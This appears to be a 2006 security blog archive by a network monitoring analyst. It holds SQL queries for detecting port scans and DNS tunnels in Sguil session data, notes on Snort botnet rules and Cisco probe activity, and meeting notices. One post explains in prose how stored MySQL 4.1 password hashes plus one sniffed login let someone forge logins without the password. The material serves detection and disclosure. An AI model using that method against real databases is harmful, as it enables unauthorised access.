Tuesday, May 30, 2006

InfoSeCon 2006 Report

Earlier this month, I was very fortunate to be an invited speaker at InfoSeCon 2006. This was my second year speaking there, and there are two things you should know about this conference:


  1. It's a small conference, and the organizers have created an atmosphere where the speakers and attendees mingle freely, discuss issues over dinner and drinks, and actually talk rather than just attend presentations. They've built a community, and this works extraordinarily well for both speakers and attendees.
  2. The location is spectacular. Dubrovnik is a UNESCO World Heritage Site for a reason, and it's no joke when they call it the "Pearl of the Adriatic." In fact, the location is so appealing that the biggest danger is that your boss will want to go instead. Fight this, or you'll miss the evening events that make the conference very much resemble a working vacation.

The conference was a mixture of combined sessions and individual "Management" and "Technical" tracks. The speaker list was headed this year by two big names in the industry: Eugene Kaspersky (of Anti-Virus fame) and Marcus Ranum (of "I invented the firewall and we've pretty much all screwed it up since" fame). Mr. Kaspersky's talks were a little light on the technical content, I thought, having been written by his marketing department. Still, it was interesting to hear him speak about the relationship between malware and organized crime. Nothing that isn't already common knowledge, but he's on the cutting edge of this fight, so just hearing his thoughts was instructive. He also spoke about the organization of his company's malware lab, but I was fairly disappointed with this, as it lacked substantive detail and mostly just emphasized the fact that they do have such a lab.

Marcus Ranum's talks were much more interesting. In fact, he was something of a lightning rod of controversy, as I understand him to be elsewhere, too. He gave a pair of talks, about the state of the security industry and about the evolution of the firewall. The overarching theme, which became a sort of conference catchphrase, was that "we're doing security wrong." Not that anyone has a comprehensive solution yet, but if the first step is admitting that we have a problem, then I think he's done his job. I don't always agree with Marcus, but after hearing him speak and spending some time with him informally, I think his points are valid.

By the way, remember when I said that the organizers try hard to create opportunities to mingle with the speakers? It works. I really appreciated the opportunity to sit down and have several conversations with Marcus. I also got to spend rather a lot of time with some friends, both new and old, in the Croatian, Slovenian and Slovakian IT industries. We prowled the medieval streets of Cavtat looking for vampire photos and listened to a restaurant full of boisterous Croatian tourists singing along with an accordion. We sailed the Adriatic and scaled the Dubrovnik city walls. We even learned a few things about the discipline of Information Security. All in all, a valuable and enjoyable trip, and I can't wait for InfoSeCon 2007!

Friday, May 19, 2006

Scan detection via network session records

I needed a quick, easy way to detect scanners on my LAN. Since I'm running Sguil, I have plenty of data about network sessions in a convenient MySQL database. I thought, why not use that?

My premise (cribbed from Snort's sfPortscan preprocessor) is that network scanning activity stands out due to its unusually high number of failed connection attempts. In other words, most of the time the services being probed are not available, and this makes the scanner easier to spot. Here is a simple perl script I wrote that implements this type of scan detection by querying Sguil's SANCP session database.

To use it, you'll need to edit the script to modify the $HOME_NET variable. It's a snippet of SQL code, but it's very simple and documented in the comments. I'm looking for scanning activity on my own LAN, so the default is to set it to search only for activity with two local endpoints. If you are reasonably fluent in SQL, though, you can customize this to find other types of scans. There are a few other variables you can tweak (read the comments) but nothing terribly critical.

The script identifies two types of scanning activity. Portsweepers are systems that try a few different ports across a variety of addresses. For example, malware that looks around trying to find open web servers would fall into this category. On the other hand, portscanners are systems that try a lot of ports, usually on a relatively few systems. Attackers that are trying to enumerate services on a subnet would be a good example.
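
If you just want the flavor of what the script does without reading the code, here's a rough sketch of the two checks in plain SQL. This is an illustration, not the script itself: it assumes the standard Sguil SANCP schema (src_ip, dst_ip, dst_port, dst_bytes, start_time), treats "no bytes back from the destination" as a failed attempt, and uses arbitrary thresholds with no $HOME_NET filtering.

-- Portscanners: one source probing many ports (mostly with no reply)
select INET_NTOA(src_ip) as scanner,
       count(distinct dst_port) as ports_tried
from sancp
where dst_bytes = 0
  and start_time > DATE_SUB(NOW(), INTERVAL 1 DAY)
group by src_ip
having ports_tried > 100
order by ports_tried DESC;

-- Portsweepers: one source probing many different hosts
select INET_NTOA(src_ip) as sweeper,
       count(distinct dst_ip) as hosts_tried
from sancp
where dst_bytes = 0
  and start_time > DATE_SUB(NOW(), INTERVAL 1 DAY)
group by src_ip
having hosts_tried > 100
order by hosts_tried DESC;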

I haven't really tested this anywhere but a RHEL/CentOS 4 system. If you get it working on some other platform, or if you have any other comments/suggestions/improvements, please post them here.

Thursday, May 18, 2006

The value of privacy

In his latest editorial, The Eternal Value of Privacy, Bruce Schneier provides a compelling answer to the question, "If you aren't doing anything wrong, what do you have to hide?"

Schneier's argument is slanted more towards the national security issues of domestic wiretaps, video surveillance and the like, but his points are also valuable from a cybersecurity perspective.

Many of us are tasked with monitoring for abuses of and intrusions into our computing infrastructure. This means collecting and analyzing data, much of which may be considered personal or private. IDS analysts especially may come into contact with the contents of personal communications such as emails, instant messages or even VOIP calls. We may see web URLs, chat room logs or forum postings detailing medical conditions, alternate lifestyles, or even employment concerns. It is our duty (and in many cases, our legal obligation) to protect this information against disclosure, even to others within our own organizations, unless there is a clear security concern which must be acted upon. Even then, discretion and need-to-know are critical.

If you're reading my blog, you're in a group of people who are likely to tackle thorny privacy issues on a regular basis. I highly recommend taking the time to read Schneier's short editorial and think about how this applies to your own situation.

Wednesday, May 03, 2006

A traffic-analysis approach to detecting DNS tunnels

I had the chance to see a very interesting presentation last week about DNS tunnels. I understand the concepts well enough, but I had never run into one "in the wild." I realized, however, that I probably wouldn't have noticed one in the first place, so I decided to try to do a little digging to see if I could come up with a detection mechanism.

Fortunately, I'm using Sguil to collect all my Network Security Monitoring (NSM) data. As you may know, Sguil collects (at least) three types of data:


  1. Snort IDS alerts
  2. Network session data (from SANCP)
  3. Full content packet captures (from a 2nd instance of Snort)

The packet captures are not typically used for alerting purposes, which left me with two options: an IDS signature-based approach, or traffic analysis of the network session records.

Some DNS tunnel detection signatures already exist (the Sourcefire community ruleset has signatures to detect the NSTX tunnel software), but I think this approach is doomed to failure from the start. A signature-based approach would be good for detecting specific instances of DNS tunnelling software, but for real protection, a more general detection capability is required. I chose to try the traffic analysis approach instead.

I started with the assumption that there were basically three uses for DNS tunnels, to wit:

  1. Data exfiltration (sending data out of the LAN)
  2. Data infiltration (downloads to the local LAN)
  3. Two-way interactive traffic

Of course, the fourth possibility is that a tunnel could be used for some combination of the above, but I left that out of scope. I also ignored two-way interactive traffic for now, since it's harder and I'm just starting to look into this. My main goal was to identify data exfiltration by looking at "lopsided" transfers. By extension, the same technique can also be used to discover data infiltration, as I'll show.

Once I identified the types of tunnels I wanted to detect, I tried to deduce what their traffic profiles would look like. Specifically, I assumed the following:

  1. At least one side of the session would be associated with port 53.
  2. The tunnel could use either TCP or UDP (though UDP is the most likely), but since SANCP is able to construct pseudo-sessions from sessionless UDP traffic, I could effectively ignore the difference between TCP and UDP sessions.
  3. The upload/download ratio would be lopsided. That is, the tunnel client would either be sending more data than it receives (exfiltration) or vice versa (infiltration).

If you're not familiar with Sguil, just know that all the network session data is stored in a MySQL database. Although you normally access this data through the Sguil GUI, it's also easy to connect with the normal MySQL client application and send arbitrary SQL queries. I started with this one:

select start_time, end_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port, ip_proto,
       (src_bytes / dst_bytes) as ratio
from sancp
where dst_port = 53
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2
order by ratio DESC
LIMIT 25;

The intent of this query is to identify at most 25 DNS sessions during the last week where the initiator (the client) sends at least twice as much data as it receives in response. Sounds good, but it is actually a bit naive. It turns out that many small transactions fit this profile, especially if the DNS server doesn't respond (the response size is 0 bytes).

I fixed this problem by also looking for a minimum number of bytes transferred (in either direction). After all, the purpose of a DNS tunnel is to transfer data, so if there are only a few bytes, the odds are very, very good that it's not a tunnel. In this version, I've set up the query to also check that the total number of source and destination bytes is at least 50,000:

select start_time, end_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port, ip_proto,
       (src_bytes + dst_bytes) as total,
       (src_bytes / dst_bytes) as ratio
from sancp
where dst_port = 53
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2 and total > 50000
order by total DESC, ratio DESC
LIMIT 25;

This brings the number of false positives down quite a bit. If this still isn't good enough, you can tune both the ratio and the total bytes to give you whatever level of sensitivity you feel comfortable with. Increasing either number should decrease false positives, but at the expense of creating more false negatives (i.e., you might miss some tunnels).

By the way, I mentioned before that you could use the same approach to detect either exfiltration or infiltration. The queries above are written for exfiltration, so if you would like to look for infiltration, simply change the definition of the "ratio" parameter from this:

(src_bytes / dst_bytes) as ratio

to this:

(dst_bytes / src_bytes) as ratio

That'll look for data going in the other direction. The rest of the query is identical for either case.

As I mentioned, I've never encountered a DNS tunnel outside of a lab environment (yet), so I can't say how well my approach holds up in the real world. If anyone with more experience would like to comment, I'm all ears. Similarly, if anyone decides to try out my method, I'd love to hear how it works out for you.

Update 2006-05-04 14:33: My fellow #snort-gui hanger-on and all-around smart guy tranzorp has posted additional analysis of my ideas on his blog. Specifically, he points to two easy ways to evade this simple type of analysis, and I recommend that you read his post for yourself, because he's got a lot of experience with this topic.

If you just want a quick 'bang-it-out-in-an-emergency' check for tunnels, the following updated query isn't bad. It's the same as above, but corrects for the fact that the DNS reply contains a complete copy of the DNS query, as tranzorp pointed out:

select start_time, end_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port, ip_proto,
       (src_bytes + (dst_bytes - src_bytes)) as total,
       (src_bytes / (dst_bytes - src_bytes)) as ratio
from sancp
where dst_port = 53
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2 and total > 50000
order by total DESC, ratio DESC
LIMIT 25;


Based on feedback I've received from tranzorp and others, I'm looking at a more statistical approach to the problem. In short, I'm experimenting with computing a pseudo-bandwidth for each session (bytes sent / session duration), then looking for abnormally high or low bandwidth sessions. I've got a prototype, but it's in perl, so it's horribly inefficient for the mountain of DNS session data I collect. I'll post something about it when I've had a chance to tweak it some more.
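
My prototype is in perl, but the core idea is simple enough to express as a SANCP query. Here's a rough sketch, assuming the same SANCP schema as above (including its duration column); the zero-duration guard just avoids division by zero, and you'd still need to decide what "abnormal" means for your own network:

select start_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port,
       (src_bytes + dst_bytes) / duration as pseudo_bw
from sancp
where dst_port = 53
  and duration > 0
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
order by pseudo_bw DESC
LIMIT 25;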

Tuesday, May 02, 2006

Unintentionally acknowledging the truth

Here's a funny typo in a recent article about Verizon upgrading the bandwidth on its fiber-to-the-home service:

The 30-Mbit premium tier was left untouched, in bot performance and price.

Too true, I'm afraid. Too true.

Sunday, April 30, 2006

New HRSUG Website Launched

I'm pleased to announce the grand opening of the new HRSUG website at hrsug.org. The site will carry the latest information about HRSUG meetings and happenings, and separates the information from my personal blog (this one).

I also hope to publish network security-related notes or articles contributed by HRSUG members. If you want blog posting privileges, let me know and I can add you to the list.

Let's keep this announcement short and sweet. Remember, HRSUG is for the members, so let me know if you have ideas for improving the site.

If you read this far, it may also interest you to know that the May HRSUG meeting is coming up this week.

Wednesday, April 19, 2006

EIDE/SATA USB adapter cable, good for forensics?

This product looks like it could really be nice for acquiring images of suspect hard drives.

One interesting feature is that you can connect both the EIDE and the SATA drive at the same time. I guess it could be a bit slow trying to acquire an image when both the source and destination drives are on the same USB port, but on the other hand it's a lot more portable than a full tower rig, so things might balance out.

The obvious problem is the lack of an integrated write-blocker, but I guess you could use your own along with this device.

Anyone tried one yet?

Tuesday, April 04, 2006

April HRSUG Meeting Reminder

Hi, all. I just want to remind everyone that the April meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Thursday, 6 April 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

The topic for the meeting will be "EZ Snort Rules", an introduction to writing basic IDS rules in everyone's favorite pig-themed IDS. See you there!

Update 04/06/06 22:30: I've posted the slides for my presentation on the Vorant downloads page. The full title of the talk is "EZ Snort Rules: Find the Truffles, Leave the Dirt".

Thursday, March 30, 2006

MySQL 4.1.x authentication internals

While reviewing the deployment plans for a new MySQL server yesterday, I started wondering about the security of the authentication protocol it uses. Most of the users of the new database would be accessing it via the LAN, without the benefit of SSL encryption. It's well known that the MySQL 3.x authentication protocol is vulnerable to sniffing attacks, so MySQL 4.1 introduced a new authentication scheme designed to be more secure even over a plaintext session. But was it good enough?

I first spent some time understanding exactly how the protocol works. Thanks to some kind folks in the #mysql channel on irc.freenode.net, I located the MySQL internals documentation page that describes the authentication protocol. Unfortunately, this page doesn't really describe what's going on in the 4.1 protocol, so I turned to the source code for the definitive scoop.

Just so no one else has to do this again, here's a better description of how the protocol works, based on the 5.0.19 release. Look in libmysql/password.c at the scramble() and check_scramble() functions if you want to check the source code for yourself.

The first thing to know is that the MySQL server stores password information in the "Password" field of the "mysql.user" table. This isn't actually the plaintext password; it's a SHA1 hash of a SHA1 hash of the password, like this: SHA1(SHA1(password)).
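
If you want to convince yourself of that, MySQL's own SHA1() function makes it easy to check. A quick sanity test (this assumes MySQL 4.1 or later, where PASSWORD() produces the new-style '*'-prefixed hash; the password string here is obviously just an example):

-- Both columns should produce the same value: the stored hash is just
-- SHA1 applied to the binary SHA1 of the password, hex-encoded, with a
-- leading '*' marker.
select PASSWORD('example_password') as stored_form,
       CONCAT('*', UPPER(SHA1(UNHEX(SHA1('example_password'))))) as double_sha1;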

When a client tries to connect, the server will first generate a random string (the "seed" or "salt", depending on which document you're reading) and send it to the client. More on this later.

Now the client must ask for the user's password and use it to compute two hashes. The first hash is a simple hash of the user's password: SHA1(password). This is referred to in the code as the "stage1_hash". The client re-hashes stage1 to obtain the "stage2_hash": SHA1(stage1_hash). Note that the stage2 hash is the same as the hash the server stored in the database.

Next, the client hashes the combination of the seed and the stage2 hash like so: SHA1(seed + stage2_hash). This temporary result is then XORed with the stage1 hash and transmitted to the server.

Now the server has all the information it needs to decide whether the user supplied the correct password. Remember that the server stores the stage2_hash in the database and originally created the seed, so it knows both of those. What it wants to recover is the stage1_hash. Fortunately, the data transmitted by the client is just SHA1(seed + stage2_hash) XORed with the stage1 hash. To recover the stage1 hash, the server recomputes SHA1(seed + stage2_hash) and XORs it with the data provided by the client; the result is the stage1 hash. Since the stage2_hash is just SHA1(stage1_hash), the server can then compute a new stage2_hash and compare it to the hash in the database. If the two match, the user provided the proper password.

Ok, I admit that was probably a little confusing, but here's where I think it gets really interesting. There is a flaw in this protocol. The security depends on keeping two pieces of information a secret from attackers: the stage1 and stage2 hashes. If the attacker knows both hashes, they can construct a login request that will be accepted by the server.

Stage2 hashes are protected by keeping the database files away from prying eyes, but if an attacker were to steal the database backup tapes, for example, the hashes for all database accounts would be in his possession.

Still, just having the stage2 hashes is not enough. The final piece of the client's authentication credential is XORed with the stage1 hash, and since the server doesn't store the stage1 hash, the protocol has to provide it with everything it needs to derive that hash itself. Unfortunately, that means the same information can be derived by anyone who can sniff a valid authentication transaction off the wire and who also possesses a copy of the stage2 hash.

So the weakness is that if an attacker has the stage2_hash stored in the db, and can observe a single successful authentication transaction, they can recover the stage1_hash for that account. Using both hashes, they can then create their own successful login request, even without knowing the user's actual password.

I've confirmed this with the MySQL team, who say that this is a known issue. It is difficult to exploit, I think, since you need a fair amount of information in order to make the attack successful. Frankly, if you already have the password hashes, you probably also already have the rest of the info in the database as well, so this might be overkill. Still, I had fun working through this last night, so I thought others might enjoy it as well. At the least, maybe I'll save someone else the time I spent understanding how the protocol works.

If this vulnerability really concerns you, you can protect the stage1 hash information by using MySQL's built-in SSL session encryption support. You should probably also be encrypting your backup tapes to protect the stage2 hash and all the data.

Friday, March 17, 2006

Detecting common botnets with Snort

I've been reading up on the mechanics of how popular bot software actually works, with an eye towards detecting it on the wire. I've been using the BLEEDING-EDGE ATTACK RESPONSE IRC - Nick change on non-std port rule and its cousins, which attempt to detect botnets and other "covert" channels that think they're clever by sending IRC protocol traffic over ports that are not normally associated with IRC. These rules work well, but have two problems:


  1. Some IM programs (like ICQ and MSN Messenger) use the IRC protocol on various ports and thus trigger this rule
  2. The rule doesn't detect botnet traffic if they happen to use the standard IRC port (6667)

One of the papers I've been reading recently was this great overview of four popular bot packages, An Inside Look at Botnets by Paul Barford and Vinod Yegneswaran. This isn't groundbreaking new research by any means, but they have started to put together some basic practical information about how these things work on the wire.

Having read that paper, I decided it would be fun to write a set of Snort rules to detect traffic generated by the four bots they mention. That would at least address problem #2, so it could be a very worthwhile effort as well. Here are the rules, suitable for inclusion in your own local.rules file.

For those who are curious about what these do, there are three functions. The first rule (sid 9000075) attempts to define IRC protocol traffic, no matter what port the server is using. It sets the "is_proto_irc" flowbit on the session, so the later rules can depend on this to be set and won't do a lot of work inspecting non-IRC packets. This rule will never generate any alerts; it's only there to make the other rules in this file more efficient.

The second rule (sid 9000076) isn't necessarily related directly to botnets. It looks for IRC servers that seem to be on your local network and are communicating with outside hosts. If you actually do run a legitimate server, modify or comment this out as appropriate.

All the rest of the rules look for specific commands used by AgoBot/PhatBot, SDBot, SpyBot and GTBot. The GTBot commands are slightly more complex. All the others just use plain words (like "portscan ") for commands, but GTBot uses a command character to distinguish commands from other data (like "!portscan "). Since it seemed to me that the command character was likely to change from botherder to botherder, I coded in a regular expression that tried to allow a variety of possible cmdchars. You'll see those in the rules.

Anyway, feel free to use these rules if you like. I won't guarantee they work well yet, since I haven't been running them long, but so far so good. They probably won't crash your snort process, but that's about all I can say about them. I will give you one note of caution: If you find an active botnet, you may generate a lot of alerts. Consider using thresholding to avoid overwhelming your IDS analyst.

If you actually detect a botnet through these rules, please let me know. As far as I know, I have no active botnets right now, so I've only been able to test them against contrived traffic and not live data. I'd like to know if they do or do not work in the wild.

Update 4/4/2006: These bot rules are now included as part of the snort.org community ruleset. Thanks to Sourcefire's Alex Kirk, who made the rules better by pointing out that I forgot to add the "nocase" directive to make the rules case-insensitive. If you're using my rules, I recommend that you remove them and have a look at the community rules instead.

Tuesday, February 28, 2006

I'm finally caving in...

...and sitting the CISSP exam. I mentioned this to a few people today and got one of two reactions:


  1. They immediately lost all respect for me, or
  2. Ok, I lied. There was only one reaction.

I admit this was based on a rather limited sample, but wow. People really seem to hate the CISSP, all it stands for, its dog and the horse it rode in on.

I've read some of Richard Bejtlich's thoughts on the matter (which made quite the splash when they were originally published). I agree with him that the (ISC)² code of ethics is pretty much all the CISSP has going for it, but I don't think that explains the vituperative reactions I see whenever CISSP is mentioned. Nor do I necessarily think it's jealousy, because most of the people I get this from could easily pass the exam (if they were willing to pony up the $500 fee).

It seems to me as though I've detected a bit of a pattern, though: the more comfortable a person is with technical matters, the less likely they are to respect the CISSP. Is it just our geeky tendency to look down upon those things which can be done by any suit-and-tie lackey? Is the perception that CISSP == management == PHB? I don't think it's really that simple, but maybe we geeks just need someone to love to hate and Bill Gates wasn't available today.

If anyone has any theories they'd like to share, or if you hate people who hold CISSPs and would be kind enough to let me know why, please leave a comment.

Sunday, February 26, 2006

March HRSUG meeting

Hi, all. I just want to remind everyone that the March meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Wednesday, 8 March 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040


As of this moment, there is no topic assigned to the meeting. I'll work on that, but if anyone has a suggestion or would like to volunteer to talk about something, please let me know.

Friday, February 24, 2006

Weird Cisco attacks happening all over the world

On February 4th, I started seeing small numbers of the following Snort alert:

Cisco IOS HTTP configuration attempt

Here's a breakdown of the number of alerts per day for the first couple of weeks of the month:


| 2006-02-04 | 6 |
| 2006-02-05 | 4 |
| 2006-02-13 | 2 |
| 2006-02-14 | 1 |
| 2006-02-15 | 30 |
| 2006-02-16 | 26 |
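
If you want to pull similar per-day counts out of your own Sguil database, a query along these lines should do it. This is a sketch, not the exact query I ran: it assumes the standard Sguil event table (with its timestamp and signature columns), and you'd adjust the signature match to fit your own ruleset.

select DATE(timestamp) as day, count(*) as alerts
from event
where signature like '%Cisco IOS HTTP configuration attempt%'
group by day
order by day;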

There were two things that drew my attention to this activity. First, it's an old exploit (detailed in this advisory). Second, there was a sharp spike in activity starting on the 15th.

Around the same time as I noticed this, the SANS ISC Handler's Diary posted an entry about it, and they didn't know what was going on either. I contacted them about it, and have since heard nothing in reply.

I didn't think too much about this at first, but after collecting a few more days' worth of data, I noticed the following: each source IP only attacked one destination IP, and while there is usually a steady stream of 3 or 4 alerts per hour, there are some periods where I go for several hours without seeing anything. These things tend to suggest that the attacks are coordinated, probably through a single botnet.

Today, I heard from several other analysts around the planet who have seen similar traffic. I got the IPs and timestamps from a few of them and am in the process of analyzing some of the data. What I can see so far is that we've got around 280 individual attacks from ~250 unique IPs. Each of the three sites reporting has at least a few IPs in common with the others, further supporting my idea that this is all due to one big botnet.

I don't have much information yet, but big thanks to fellow #snort-gui regulars David Lowless and hewhodoesnotwishtobenamedbutknowswhoheiseventhoughIrefusetousehiscodenameJesus for providing data and sharing thoughts & ideas about this. It may all just turn out to be nothing, but the coordination and stealth involved make it interesting if nothing else.

Update 2006-02-24 15:53: I asked around on the #shadowserver channel, and have found that attacks like the ones I observed have been found in at least one active botnet (not sure if the scattered sightings are from different botnets or not).

Why they are probing for 5 year old vulnerabilities in Cisco routers is still a mystery. Maybe they just want to use them as proxies for IRC/spam/other attacks. I hope that's the extent of their ambitions.

Update 2006-03-06 11:41: Based on conversations I've had with others who are experiencing these sorts of attacks, I've concluded that the most likely scenario is that the perpetrator is hoping to gain access to Cisco devices in order to use them as IRC proxies to hide their true network address while trading credit card numbers and other illicit info. In other words, they can log on to the devices and initiate outbound network connections to IRC servers. One analyst speculated that there may be an IRC client plugin of some sort to facilitate this, and that seems like a reasonable assumption.

BTW, if this technique is used to disguise IRC, it may also be used to disguise connections to other services as well (HTTP?). This all seems like a pretty roundabout way to achieve the hypothesized goal, but certainly in keeping with technology that existed at the time the original exploit was discovered. Maybe someone is just using some old scripts they found online somewhere?

Update 2006-03-07 06:53: The Philippine Honeynet Project (which I reached via this SANS ISC diary entry) has also noticed these probes. Their analysis includes the name of the tool they believe responsible (ciscoscanner). Unaccountably, though, they're suggesting that the tool is looking for the vulnerability listed in this advisory, which doesn't seem to fit the observed data. It's good to read that some other people have finally noticed this, at least. They kind of stick out like a sore thumb if you're paying attention.

Tuesday, February 14, 2006

Dshield for IDS systems?

Most of us are probably familiar with the Dshield project, which collects firewall logs from users around the planet. They process this data to extract attack trends and produce reports we can use to help evaluate the potential "hostileness" (my term) of a given IP address.

While going through my morning sguil operations, I thought to myself, "Why haven't we done this for IDS events yet?"

My idea is very simple. Sguil requires an analyst to assign each event to a category (e.g., "successful admin compromise", "attempted compromise", "virus activity", "no action required", etc.). For those categories which correspond to confirmed malicious intent, why not collect data about the alerts and forward it to a central clearinghouse?

Of course, you wouldn't want to collect all the data, for privacy reasons. You'd probably only want the attacker's IP, the timestamp and a common reference number to show what event occurred (the snort sid, for example, though that only applies to a single IDS). You could further apply some basic rules to the data before submission, to delete all records originating from your own network, for example.
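
To make that concrete, here's a hypothetical sketch of the kind of record a Sguil site could export. The column names follow Sguil's event table, but the status codes for the "confirmed malicious" categories and the local network range are placeholders you'd have to fill in for your own installation:

select timestamp,
       INET_NTOA(src_ip) as attacker,
       signature_id as snort_sid
from event
where status in (11, 12, 13)   -- placeholder: your "confirmed malicious" category codes
  and src_ip not between INET_ATON('192.168.0.0') and INET_ATON('192.168.255.255')
                                -- placeholder: drop events sourced from your own address space
order by timestamp;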

So what would be some of the benefits of this system? First, the clearinghouse would be in a position to notice hosts which were attacking large segments of the Internet. This determination would be based on confirmed data submitted by human analysts and would therefore be more inherently trustworthy than data garnered from firewall logs. Second, the clearinghouse could directly observe and report on the types of attacks being seen in the wild, something the existing Dshield project cannot do. Finally, this data could be fed back down into the IDS analysis tools to help adjust the severity of observed events based on how similar events were previously categorized by other analysts. Sort of a Cloudmark for IDS.

I'm not suggesting that there's anything wrong with Dshield. They're providing a great service that I rely upon to help me make decisions every day. It's just that they're only capturing one type of data (firewall logs). I think their model could logically be extended to IDS operations, to the benefit of the entire community.

Update 02/14/2006 11:36: Someone on the #dshield IRC channel mentioned that this idea also sounds similar to Shadowserver. True enough, though they're using their own net of mwcollect and Nepenthes collectors to track malware distribution, and so they're not capturing IDS data. Great for tracking automated attacks and generating high-quality blacklists of sites actually distributing malware. Not quite what I had in mind, but also a very valuable dshield-esque service. Check them out, but keep in mind that they haven't gone public with their data yet. If you ask nicely, though, they might give you access to the IRC channel that keeps track of the botnet reports in realtime. I'm going to check it out.

Sguil 0.6.1 released

There's a new Sguil release to start your morning. 0.6.1 features an updated client that's more responsive to large data sets. It also has some major new features, like:


  • The use of UNION in the MySQL queries is now the default. This has led to at least an order of magnitude decrease in the search time in my own (huge) SANCP database (see the sketch after this list for why this helps).
  • There's a new panel that displays snort statistics for each sensor. This finally allows you a semi-realtime view of packet loss and traffic/session statistics for each sensor.
  • Communication between the sensors and the server can now be encrypted with OpenSSL/TLS, using the same mechanism that protects the traffic between the client and server.
  • Numerous important bug fixes
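
For anyone wondering why UNION makes such a dramatic difference: a query that matches an address as either source or destination can't make good use of the single-column indexes when it's written with OR, but splitting it into two queries lets each half use its own index. A simplified sketch of the pattern (the address is made up, and the real queries sguil generates are more involved):

-- Old style: OR across two different indexed columns often ends up scanning
select * from sancp
where src_ip = INET_ATON('10.1.2.3') or dst_ip = INET_ATON('10.1.2.3');

-- New style: each half of the UNION can use its own index
select * from sancp where src_ip = INET_ATON('10.1.2.3')
union
select * from sancp where dst_ip = INET_ATON('10.1.2.3');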

I've been using the prerelease version of this code for a little while now, and it works a heck of a lot better than 0.6.0p1 did.

One thing that I did notice is that it's not quite a drop-in replacement for the old version. If you are using TclTLS to encrypt client/server communications, you will need to add the "-o" command line flag to your startup script to turn this feature on. In previous versions, specifying the TLS library location with "-O" was enough, but now two subsystems can use the same library (the client and the sensor communication paths) so you have to explicitly tell sguild which one(s) you want to encrypt.

This small caveat aside, if you're using sguil, you probably should upgrade at your earliest convenience.

Wednesday, February 08, 2006

Packet fragmentation issues in the Snort IDS

One of the features that will eventually make it into Snort is a new preprocessor for handling fragmented IP packets (the "frag3" preprocessor). Sourcefire's Judy Novak has written a paper outlining the challenges to doing proper fragmentation reassembly, entitled Target-Based Fragmentation Reassembly.

It just so happens that Judy is speaking on this topic tonight at our HRSUG meeting, so if you're looking for more information about frag3 issues, now you have the link.

Update 2006-02-14 08:53: As Joel Esler pointed out, I got this whole topic badly wrong. I'm not really sure why, since I'm pretty familiar with frag3 and have been using it for some time. Maybe I was just rushed. Yeah, that's it.

Anyway, the actual topic was the new stream5 TCP stream reassembly preprocessor, and its application of target-based stream reassembly policies. It was, by the way, an awesome presentation! Thanks, Judy, and come back to see us any time!

Tuesday, February 07, 2006

DDoS bot owner's story

A web server managed by fellow #snort-gui regular Chas Tomlin was recently attacked and turned into a DDoS zombie. Chas wrote up his experience and shows how he used a combination of network (sguil) and host forensics to track down the source of the problem. A good read, and he includes code, too. My favorite part is the IRC log where he secretly captured two of the bot operators chatting about how they got in.

Monday, February 06, 2006

Disabling IPv6 under Linux

I set up a sguil sensor at home this weekend, and decided to have it monitor outside my firewall, just because I wanted to know what things looked like out there. The sensor runs Linux, and I followed the standard host-hardening prescription of turning off unnecessary services and interfaces. Since I'm not using IPv6, I wanted to turn support for it off entirely.

Being too lazy to compile my own kernel (goodbye, easy updates), I wanted to find a good way to disable IPv6 globally. It turns out that the easiest thing to do is to add the following line to your /etc/modules.conf file, then reboot.


alias net-pf-10 off

This prevents the kernel from loading the module that supports IPv6 (called, simply, "ipv6"). This is a CentOS 4.2 box, and I could find no easier way of accomplishing the same thing.

February HRSUG Meeting Reminder

Just a reminder that the February meeting of the Hampton Roads Snort Users' Group is this week:


Date: 8 Feb 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

Our guest speaker is Sourcefire's Judy Novak, who will be speaking about target-based fragment reassembly in Snort. Judy's bio and presentation abstract can be found in the original meeting announcement.

Sunday, February 05, 2006

BackTrack Security LiveCD Beta

I don't watch football (Superbowl? What's that?) so while the entire US is shut down to watch an East Coast/West Coast smackdown, of course I'm playing with the new BackTrack LiveCD.

In case you're not familiar with this project, this is the first beta release of the projects formerly known as Auditor and WHAX, merged into a single distribution that looks, on first glance, like a really strong offering.

I never used WHAX, but I have followed Auditor for about a year. It was a really nice collection of pre-installed security tools, mostly hacking and cracking packages like network scanners, vulnerability assessment tools, bluetooth utils, password crackers and the like. Not only did the OS offer reliable hardware autodetection, but the Auditor team went to a lot of trouble to add run-time autoconfiguration to many of the included tools (think: no more editing kismet.conf).

This version of BackTrack will look very familiar to Auditor users. It preserves much of Auditor's look-and-feel, including the task-oriented launch menu that made it so easy to find the right tool for the situation. There are still an awful lot of tools available, though I haven't compared the lists to see which were added or dropped in the conversion to BackTrack.

While the old Auditor releases were monolithic CD images, BackTrack is based on the SLAX Slackware LiveCD, and now offers easy GUI-based ISO customization. This was originally a feature of WHAX/SLAX, and it makes it easy to create a specialized BackTrack ISO for whatever you have in mind.

For example, even though the beta was just released today, I found that there were already three patches available. You read that right: patches for a LiveCD ISO. I downloaded the three module files from the BackTrack website as well as the Windows-based SLAX customization tool, MySLAX Creator. Within about 1 minute, I had remastered the ISO to include the new patches. Sure enough, at boot time it recognized the additional modules and loaded them into the running image.

Although the software on the beta release is not itself modularized, this is planned for the future, giving users the ability to strip out things they won't need. Users can already create additional modules to add to their ISO images, and I may try this with the Sguil and InstantNSM software.

Tomorrow, I hope to find time to play with some of the included tools some more, especially the bluetooth utilities. In the meantime, if you're at all interested in a security tools LiveCD, you really should give BackTrack a try.

Thursday, February 02, 2006

My experience with m0n0wall

